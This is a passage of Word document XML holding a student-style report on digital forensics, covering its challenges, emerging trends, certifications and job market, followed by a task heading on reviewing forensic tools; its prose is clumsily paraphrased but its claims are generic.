    </w:p>
    <w:p w14:paraId="57C00664" w14:textId="77777777" w:rsidR="00BA0812" w:rsidRDefault="00BA0812" w:rsidP="00BA0812">
      <w:r>
        <w:t xml:space="preserve">Data Quantity: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D78B39D" w14:textId="69EA2CA8" w:rsidR="00BA0812" w:rsidRDefault="00BA0812" w:rsidP="00BA0812">
      <w:r>
        <w:t>The dramatic development of computerized information makes it trying for examiners to productively process and break down tremendous measures of data inside sensible time periods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048E80A7" w14:textId="77777777" w:rsidR="00BA0812" w:rsidRDefault="00BA0812" w:rsidP="00BA0812">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Worldwide Jurisdictional Issues: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B544553" w14:textId="5E6284D3" w:rsidR="00BA0812" w:rsidRDefault="00BA0812" w:rsidP="00BA0812">
      <w:r>
        <w:t>Digital forensics investigations face jurisdictional challenges because cybercrime frequently crosses national boundaries. Collaboration between policing on a global scale is vital.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D01F00A" w14:textId="77777777" w:rsidR="00BA0812" w:rsidRDefault="00BA0812" w:rsidP="00BA0812">
      <w:r>
        <w:t>Quick Innovative Changes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24ED2E5A" w14:textId="7BFB3B7B" w:rsidR="00BA0812" w:rsidRDefault="00BA0812" w:rsidP="00BA0812">
      <w:r>
        <w:t>The fast speed of innovative progressions requires computerized legal sciences experts to ceaselessly refresh their abilities and apparatuses to remain successful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D537FC" w14:textId="53D17325" w:rsidR="00902109" w:rsidRDefault="00902109" w:rsidP="00902109">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="253B3FEA" w14:textId="6D0FB5F1" w:rsidR="00902109" w:rsidRDefault="00902109" w:rsidP="00902109">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EC3D8C3" w14:textId="0A5F6E36" w:rsidR="00902109" w:rsidRDefault="00902109" w:rsidP="00902109">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="362CDEAF" w14:textId="72679D9D" w:rsidR="00BA0812" w:rsidRDefault="00BA0812" w:rsidP="00293934"/>
    <w:p w14:paraId="5811A225" w14:textId="77777777" w:rsidR="00BA0812" w:rsidRPr="00BA0812" w:rsidRDefault="00BA0812" w:rsidP="00BA0812">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA0812">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5. Public and Worldwide Work Market:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B2257C" w14:textId="77777777" w:rsidR="00BA0812" w:rsidRDefault="00BA0812" w:rsidP="00BA0812">
      <w:r>
        <w:t xml:space="preserve">Increasing Inquiry: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378656F5" w14:textId="3B1A9AD1" w:rsidR="00BA0812" w:rsidRDefault="00BA0812" w:rsidP="00BA0812">
      <w:r>
        <w:t>The interest for computerized crime scene investigation experts is on the ascent worldwide, driven by the raising recurrence and intricacy of cybercrimes. Government organizations, policing, companies, and online protection firms look for talented people to research and forestall digital episodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55370729" w14:textId="77777777" w:rsidR="00BA0812" w:rsidRDefault="00BA0812" w:rsidP="00BA0812">
      <w:r>
        <w:t>Different Vocation Ways:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489719DB" w14:textId="48C55412" w:rsidR="00BA0812" w:rsidRDefault="00BA0812" w:rsidP="00BA0812">
      <w:r>
        <w:t xml:space="preserve"> Computerized criminology experts can seek after different profession ways, remembering jobs for policing, firms, government offices, confidential organizations, and network protection organizations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A1BC66" w14:textId="77777777" w:rsidR="00BA0812" w:rsidRDefault="00BA0812" w:rsidP="00BA0812">
      <w:r>
        <w:t>Certificates and Instruction:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73EDC914" w14:textId="7AFBB6D3" w:rsidR="00BA0812" w:rsidRDefault="00BA0812" w:rsidP="00BA0812">
      <w:r>
        <w:t xml:space="preserve"> The Certified Information Systems Security Professional (CISSP), Certified Forensic Computer Examiner (CFCE), and Certified Cyber Forensics Professional (CCFP) are examples of industry-recognized certifications that improve job prospects. Formal schooling in advanced criminology or network safety is likewise progressively esteemed by bosses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C28240D" w14:textId="77777777" w:rsidR="00BA0812" w:rsidRDefault="00BA0812" w:rsidP="00BA0812">
      <w:r>
        <w:t xml:space="preserve">Compensation Patterns: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595EE73C" w14:textId="003F0179" w:rsidR="00BA0812" w:rsidRDefault="00BA0812" w:rsidP="00BA0812">
      <w:r>
        <w:t>Digital forensics professionals earn varying salaries based on their level of experience, location, and industry. For the most part, people with specific abilities and certificates order more significant compensations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C16792A" w14:textId="75F06E68" w:rsidR="00BA0812" w:rsidRDefault="00BA0812" w:rsidP="00BA0812">
      <w:r>
        <w:t>All in all, computerized criminology is a powerful field at the convergence of innovation and regulation, assuming a vital part in tending to digital dangers. Professionals must keep up with emerging trends, overcome significant obstacles, and contribute to the global effort to combat cybercrime as the field develops. The developing interest for gifted people in the gig market highlights the significance of computerized legal sciences in the present network safety scene.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3116CEFB" w14:textId="2ED7E431" w:rsidR="000F4DEB" w:rsidRDefault="000F4DEB" w:rsidP="00BA0812"/>
    <w:p w14:paraId="2B59EA98" w14:textId="1A23DD81" w:rsidR="00293934" w:rsidRDefault="00293934" w:rsidP="00BA0812"/>
    <w:p w14:paraId="6CF5669E" w14:textId="77777777" w:rsidR="00293934" w:rsidRDefault="00293934" w:rsidP="00BA0812"/>
    <w:p w14:paraId="3E32E3CB" w14:textId="77777777" w:rsidR="000F4DEB" w:rsidRPr="000F4DEB" w:rsidRDefault="000F4DEB" w:rsidP="000F4DEB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F4DEB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Research Report - As a part of Final Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEB3DCA" w14:textId="77777777" w:rsidR="000F4DEB" w:rsidRDefault="000F4DEB" w:rsidP="00BA0812"/>
    <w:p w14:paraId="53871BA9" w14:textId="77777777" w:rsidR="000F4DEB" w:rsidRPr="000F4DEB" w:rsidRDefault="000F4DEB" w:rsidP="000F4DEB">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F4DEB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>1. Introduction:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013CFD36" w14:textId="77777777" w:rsidR="000F4DEB" w:rsidRDefault="000F4DEB" w:rsidP="000F4DEB">
      <w:r>
        <w:t>The foundation of cybercrime investigations, digital evidence integrity assurance, and overall information security is digital forensics, a key component of cybersecurity. This last report embodies a top to bottom examination of the present status, crossing point with network safety, arising patterns, key difficulties, and the public and global work market scene in computerized legal sciences.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCAB9CA" w14:textId="77777777" w:rsidR="000F4DEB" w:rsidRDefault="000F4DEB" w:rsidP="000F4DEB"/>
    <w:p w14:paraId="4B464490" w14:textId="77777777" w:rsidR="000F4DEB" w:rsidRPr="000F4DEB" w:rsidRDefault="000F4DEB" w:rsidP="000F4DEB">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F4DEB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>2. State of the Art in the Field:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C126E8" w14:textId="014CD823" w:rsidR="000F4DEB" w:rsidRDefault="000F4DEB" w:rsidP="000F4DEB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The present status of computerized criminology mirrors a powerful scene set apart by innovative headways, developing insightful procedures, and an expanding caseload. Some notable trends.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C98263B" w14:textId="77777777" w:rsidR="000F4DEB" w:rsidRDefault="000F4DEB" w:rsidP="000F4DEB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Innovative Advances:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6457782E" w14:textId="0CB51ADF" w:rsidR="000F4DEB" w:rsidRDefault="000F4DEB" w:rsidP="000F4DEB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The fuse of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>state of the art</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> innovations like man-made brainpower (simulated intelligence), AI (ML), and blockchain investigation instruments has altogether improved legal capacities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F966A9" w14:textId="77777777" w:rsidR="000F4DEB" w:rsidRDefault="000F4DEB" w:rsidP="000F4DEB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Portable and Cloud Crime scene investigation: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486D3B5A" w14:textId="2E005CFE" w:rsidR="000F4DEB" w:rsidRDefault="000F4DEB" w:rsidP="000F4DEB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>With the expansion of cell phones and distributed computing, the field has extended to address difficulties presented by cell phones and the dispersed idea of information stockpiling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E597E1" w14:textId="77777777" w:rsidR="000F4DEB" w:rsidRDefault="000F4DEB" w:rsidP="000F4DEB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Worldwide Regulation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218AD951" w14:textId="6FE46437" w:rsidR="000F4DEB" w:rsidRDefault="000F4DEB" w:rsidP="000F4DEB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> States overall are refreshing legitimate systems to address cybercrimes, highlighting the acknowledgment of computerized criminology as a basic device in policing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BFC84C" w14:textId="77777777" w:rsidR="000F4DEB" w:rsidRDefault="000F4DEB" w:rsidP="000F4DEB"/>
    <w:p w14:paraId="6673FD93" w14:textId="77777777" w:rsidR="000F4DEB" w:rsidRPr="000F4DEB" w:rsidRDefault="000F4DEB" w:rsidP="000F4DEB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F4DEB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>3. Convergence of Advanced Criminology and Online protection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD3D4CF" w14:textId="77777777" w:rsidR="000F4DEB" w:rsidRDefault="000F4DEB" w:rsidP="000F4DEB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The cooperative connection between computerized legal sciences and network protection is vital for proactively moderating and answering digital dangers. Key perspectives include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E8BAE2" w14:textId="77777777" w:rsidR="000F4DEB" w:rsidRDefault="000F4DEB" w:rsidP="000F4DEB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Occurrence Reaction Incorporation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09787024" w14:textId="1AD491C4" w:rsidR="000F4DEB" w:rsidRDefault="000F4DEB" w:rsidP="000F4DEB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> Computerized criminology assumes a crucial part in episode reaction, helping with the examination and comprehension of cyberattacks to sustain protections and forestall future occurrences.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184E097E" w14:textId="77777777" w:rsidR="000F4DEB" w:rsidRDefault="000F4DEB" w:rsidP="000F4DEB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Danger Knowledge Cooperation: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476AADCB" w14:textId="0BBDDB2A" w:rsidR="000F4DEB" w:rsidRDefault="000F4DEB" w:rsidP="00171782">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The convergence works with the age of danger knowledge, empowering network protection experts to improve their guarded methodologies in light of experiences into cybercriminal strategies, methods, and methodology (TTPs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8D954E" w14:textId="77777777" w:rsidR="00171782" w:rsidRDefault="00171782" w:rsidP="00171782">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A165E3A" w14:textId="77777777" w:rsidR="000F4DEB" w:rsidRPr="00293934" w:rsidRDefault="000F4DEB" w:rsidP="000F4DEB">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00293934">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>4. Trends on the Rise:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6729A72B" w14:textId="77777777" w:rsidR="000F4DEB" w:rsidRDefault="000F4DEB" w:rsidP="000F4DEB">
      <w:r>
        <w:t>As the advanced scene develops, arising patterns shape the fate of computerized legal sciences:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2841B308" w14:textId="77777777" w:rsidR="000F4DEB" w:rsidRDefault="000F4DEB" w:rsidP="000F4DEB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Man-made brainpower and AI: Combination of simulated intelligence and ML upgrades robotization, inconsistency identification, and example acknowledgment, speeding up information handling and examination.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E97E68" w14:textId="77777777" w:rsidR="00293934" w:rsidRDefault="000F4DEB" w:rsidP="000F4DEB">
      <w:r>
        <w:t>IoT Investigation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7E1DF4" w14:textId="4D0D079A" w:rsidR="000F4DEB" w:rsidRDefault="000F4DEB" w:rsidP="000F4DEB">
      <w:r>
        <w:t xml:space="preserve"> The rising predominance of IoT gadgets requires particular measurable ways to deal with handle different information configurations and correspondence conventions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E8CD7D" w14:textId="77777777" w:rsidR="00293934" w:rsidRDefault="000F4DEB" w:rsidP="000F4DEB">
      <w:r>
        <w:t>Blockchain Legal sciences:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3328EACB" w14:textId="23A31EFE" w:rsidR="000F4DEB" w:rsidRDefault="000F4DEB" w:rsidP="000F4DEB">
      <w:r>
        <w:t xml:space="preserve"> The ascent of blockchain innovation and digital currencies has prompted a developing interest for specialists capable in following and breaking down exchanges on decentralized records.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A83D71" w14:textId="77777777" w:rsidR="000F4DEB" w:rsidRPr="00293934" w:rsidRDefault="000F4DEB" w:rsidP="000F4DEB">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00293934">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>5. Key Difficulties:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494A1003" w14:textId="77777777" w:rsidR="000F4DEB" w:rsidRDefault="000F4DEB" w:rsidP="000F4DEB">
      <w:r>
        <w:t>Computerized criminology faces a few difficulties that effect its viability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C47E278" w14:textId="77777777" w:rsidR="00293934" w:rsidRDefault="000F4DEB" w:rsidP="000F4DEB">
      <w:r>
        <w:t>Encryption Obstacles:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102714F0" w14:textId="55201EBC" w:rsidR="000F4DEB" w:rsidRDefault="000F4DEB" w:rsidP="000F4DEB">
      <w:r>
        <w:t xml:space="preserve"> Boundless utilization of solid encryption presents difficulties in getting to and breaking down safeguarded data during examinations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F446F76" w14:textId="77777777" w:rsidR="00293934" w:rsidRDefault="000F4DEB" w:rsidP="000F4DEB">
      <w:r>
        <w:t xml:space="preserve">Information Volume Over-burden: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D17B82D" w14:textId="7CC7FD11" w:rsidR="000F4DEB" w:rsidRDefault="000F4DEB" w:rsidP="000F4DEB">
      <w:r>
        <w:t>The dramatic development of advanced information makes it trying to productively process and break down immense measures of data inside sensible time periods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE1A5AC" w14:textId="77777777" w:rsidR="00293934" w:rsidRDefault="000F4DEB" w:rsidP="000F4DEB">
      <w:r>
        <w:t xml:space="preserve">Worldwide Jurisdictional Intricacies: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9EA59B" w14:textId="1F74C621" w:rsidR="000F4DEB" w:rsidRDefault="000F4DEB" w:rsidP="000F4DEB">
      <w:r>
        <w:t>Researching cybercrimes that rise above public lines requires global collaboration and coordination, presenting jurisdictional difficulties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0343EC34" w14:textId="77777777" w:rsidR="000F4DEB" w:rsidRPr="00293934" w:rsidRDefault="000F4DEB" w:rsidP="000F4DEB">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FC93689" w14:textId="77777777" w:rsidR="000F4DEB" w:rsidRPr="00293934" w:rsidRDefault="000F4DEB" w:rsidP="000F4DEB">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00293934">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>6. Public and Worldwide Work Market:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453E046F" w14:textId="77777777" w:rsidR="000F4DEB" w:rsidRDefault="000F4DEB" w:rsidP="000F4DEB">
      <w:r>
        <w:t>The advanced crime scene investigation work market shows dynamic patterns:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6FB3BE" w14:textId="77777777" w:rsidR="00293934" w:rsidRDefault="000F4DEB" w:rsidP="000F4DEB">
      <w:r>
        <w:t>Increasing Inquiry:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79041F59" w14:textId="349D8E7A" w:rsidR="000F4DEB" w:rsidRDefault="000F4DEB" w:rsidP="000F4DEB">
      <w:r>
        <w:t xml:space="preserve"> Universally, there is a rising interest for talented computerized legal sciences experts across government organizations, policing, partnerships, and online protection firms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DF0285" w14:textId="77777777" w:rsidR="00293934" w:rsidRDefault="000F4DEB" w:rsidP="000F4DEB">
      <w:r>
        <w:t xml:space="preserve">Different Vocation Ways: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEC81A9" w14:textId="77D2307A" w:rsidR="000F4DEB" w:rsidRDefault="000F4DEB" w:rsidP="000F4DEB">
      <w:r>
        <w:t xml:space="preserve">Experts can seek after different vocation ways, going from policing to situate in </w:t>
      </w:r>
      <w:r w:rsidR="00293934">
        <w:t>COUNSILING</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> firms, government organizations, and network protection organizations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B354F29" w14:textId="77777777" w:rsidR="000F4DEB" w:rsidRDefault="000F4DEB" w:rsidP="000F4DEB">
      <w:r>
        <w:t>Certificates and Instruction: Industry-perceived affirmations and formal training upgrade work possibilities, with compensations fluctuating in light of specialization, experience, and area.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172A9424" w14:textId="77777777" w:rsidR="000F4DEB" w:rsidRDefault="000F4DEB" w:rsidP="000F4DEB"/>
    <w:p w14:paraId="298956BE" w14:textId="77777777" w:rsidR="00293934" w:rsidRDefault="00293934" w:rsidP="000F4DEB">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5781DE0D" w14:textId="559AAA6F" w:rsidR="000F4DEB" w:rsidRPr="00293934" w:rsidRDefault="000F4DEB" w:rsidP="000F4DEB">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00293934">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>7. Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB10D80" w14:textId="29FA2FC7" w:rsidR="000F4DEB" w:rsidRDefault="000F4DEB" w:rsidP="000F4DEB">
      <w:r>
        <w:t xml:space="preserve">All in all, advanced legal sciences </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>remains</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> at the bleeding edge of the fight against digital dangers, ceaselessly adjusting to mechanical moves and developing danger scenes. The </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>coordination with network safety, combined with arising patterns and the developing position market, highlights the field's importance in defending advanced environments. Tending to key difficulties is basic for supporting the viability of advanced legal sciences in a steadily developing computerized scene.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E07BB62" w14:textId="09AC937E" w:rsidR="00411EED" w:rsidRDefault="00411EED" w:rsidP="000F4DEB"/>
    <w:p w14:paraId="3CA30A09" w14:textId="55C4DD20" w:rsidR="00411EED" w:rsidRDefault="00411EED" w:rsidP="000F4DEB"/>
    <w:p w14:paraId="08268EA0" w14:textId="246E0580" w:rsidR="0066330B" w:rsidRPr="0066330B" w:rsidRDefault="0066330B" w:rsidP="0066330B">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0066330B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Task [2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C63F701" w14:textId="2207CE29" w:rsidR="00411EED" w:rsidRDefault="00411EED" w:rsidP="000F4DEB"/>
    <w:p w14:paraId="207CCAD8" w14:textId="6E7E930A" w:rsidR="00411EED" w:rsidRDefault="00411EED" w:rsidP="000F4DEB"/>
    <w:p w14:paraId="5D6AC28E" w14:textId="441575D8" w:rsidR="00411EED" w:rsidRPr="00411EED" w:rsidRDefault="00411EED" w:rsidP="0066330B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00411EED">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Review the following</w:t>
      </w:r>
      <w:r w:rsidR="0066330B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B6A11E" w14:textId="77777777" w:rsidR="00411EED" w:rsidRPr="00411EED" w:rsidRDefault="00411EED" w:rsidP="0066330B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00411EED">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Current state of digital forensic tools, their features and capabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704FEC70" w14:textId="77777777" w:rsidR="00411EED" w:rsidRPr="00411EED" w:rsidRDefault="00411EED" w:rsidP="0066330B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00411EED">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Evaluate Open-source tools with commercial forensic tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452E7E25" w14:textId="0AC99DAA" w:rsidR="00411EED" w:rsidRDefault="00411EED" w:rsidP="0066330B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1152"/>
        </w:tabs>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B24A9C" w14:textId="19E54A4B" w:rsidR="00411EED" w:rsidRDefault="00411EED" w:rsidP="00411EED">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1152"/>
        </w:tabs>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44DA3748" w14:textId="121FD053" w:rsidR="007D07AB" w:rsidRDefault="007D07AB" w:rsidP="007D07AB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6987BB45" w14:textId="17282BF9" w:rsidR="0044529A" w:rsidRDefault="0044529A" w:rsidP="007D07AB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B2BA421" w14:textId="67D2651A" w:rsidR="0044529A" w:rsidRDefault="0044529A" w:rsidP="007D07AB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
